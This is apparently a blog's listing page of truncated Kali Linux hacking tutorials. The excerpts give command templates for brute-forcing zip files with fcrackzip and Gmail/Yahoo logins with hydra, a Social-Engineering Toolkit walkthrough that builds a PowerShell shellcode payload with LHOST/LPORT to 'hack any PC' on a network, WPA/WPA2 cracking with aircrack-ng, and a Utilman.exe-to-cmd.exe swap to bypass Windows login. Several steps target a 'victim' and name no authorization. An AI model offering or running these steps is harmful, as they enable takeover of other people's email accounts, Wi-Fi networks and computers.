Posts

Showing posts with the label backdoor hacking

HOW TO CRACK A PASSWORD PROTECTED ZIP FILE USING KALI LINUX .

Image
Kali linux is one of the biggest distros powered by linux company with around 600 penetration and testing tools know how to make a kali linux iso live bootable click here . HOW TO CRACK A PASSWORD PROTECTED ZIP FILE . fcrackzip is the software preinstalled in kali linuix and backtracks which is used for cracking password by bruteforce attack .  I have created a test zip file name 100.zip with a password of admin for this demonstration purpose . Go switch to your linux terminal with your zip file and type in the command fcrackzip -b -c a -l <min>-<max> -u <location of zip file > -b : For bruteforce attack -c : use charset -l : specify length <min>-<max>:   minimum to maximum characters you guess the password has <location > : location of the .zip file . The example command look like : fcrackzip -b -c a -l 5-5 -u /root/Desktop/100.zip  hit enter Allow it some time to make the brute force attack . you can see the ...

HOW TO HACK ANY PC CONNECTED TO THE NETWORK USING KALI LINUX

Image
Kali linux is one of the biggest and popular distros from linux company with almost 600 penetration testing and hacking tools . Make kali linux iso live bootable click here . HOW TO HACK ANY PC CONNECTED YOUR NETWORK USING KALI LINUX . Switch to your linux machine and goto Applications > Exploitation Tools >  social engineering toolkit  select the first option 1) Social -Engineering Attack   hit enter  Then select option 9) Powershell Attack Vectors  hit enter Then select option 1) Powershell alphanumeric shellcode Injection hit enter. In the next step you need to type your ip address youcan know your ip address by typing the command ifconfig and hit enter mine is 192.168.0.103 i'am connected to Ethernet so my ip address is in  eth0  . Type that in LHOST : 192.168.0.103   hit enter Then type LPORT :  443  hit enter Then copy the address mine is /root/.set/report/powershell/   Then type  y...

HOW TO CRACK MAIL PASSWORDS USING HYDRA ON KALI LINUX .( GMAIL , YAHOO , LIVE) /bruteforce method .

Image
KALI LINUX is one of the most powerful linux destros of linux company . it has move 600 penetration and testing tools including all online / ofline attacks and also password attacks . to do this trick u need to have a live bootable kali linux . know how to boot a kali linux   click here . Hydra is a  online password cracking tool in kali - linux and also balcktracks . it bruteforces password for smtp servers , ftp servers and also http servers . HOW TO CRACK AN ONLINE PASSWORD  Open the terminal and type hydra and hit enter . type in the command to start bruteforce . hydra -l <mail address> -P <file > -s <port > -S -v -V -t 1 <mailer server > smtp  <mail address>  = mail address of the person example@mailer.com <file>  = path of the dictionary file OR a word list .\ create your own word list  Click here  <port> = port address of the mailer <mailer server>...

How To Crack WPA/WPA2 Wi-Fi With Kali Linux & Aircrack-ng

Image
           In this post we tell you how to crack wpa/wpa2 wi-fi in kali linux using aircrack-ng to do this first you should install kalinux or you can use live kalilinux. To make a kali-linux bootable click here            To crack wi-fi first you need a computer with kalilinux and a wireless card which supports monitor/injection mode.If your wireless card is not capable of that then you need to buy one external wireless card which is capable of monitor/injection mode.             Apart from them you need to have a word-list to crack the password from the captured packets.             First you need to understand how wifi works,wifi transmits signal in the form of packets in air so we need to capture all the packets in air so we use airodump to dump all the packets in air.After that we should see that if any one is connected to the victim wifi.If anyone is no...

HOW TO BY PASS OR RESET WINDOWS PASSWORD .( WINDOWS 8 , WIN 10)

Image
We keep many lengthy passwords for our pc to protect it from others , but many times we forget the password and goes screwed . We got a very got technique how to reset your pc password or change it back. HOW TO BY PASS OR RESET WINDOWS PASSWORD   (this method works for almost all windows versions). All you need to have is bootable kali -linux . learn how to make kali-linux bootable here . Boot into kali linux to proceed and click on live and 64 on kali  now open the terminal window on kali linux and type in the commands  mv Utilman.exe Utilman.exe.bak  (This command will back up ultiman.exe to ultiman.exe.bak which we can use for furter pourpopse ) cp cmd.exe utilman.exe   ( This command will make ultiman.exe to cmd.exe ) Reboot  (this makes your computer to reboot ) Take away your flash drive or dvd after you type in reboot command . Now windows lock screen open ups on your windows click on ultiman.exe Now a command prom...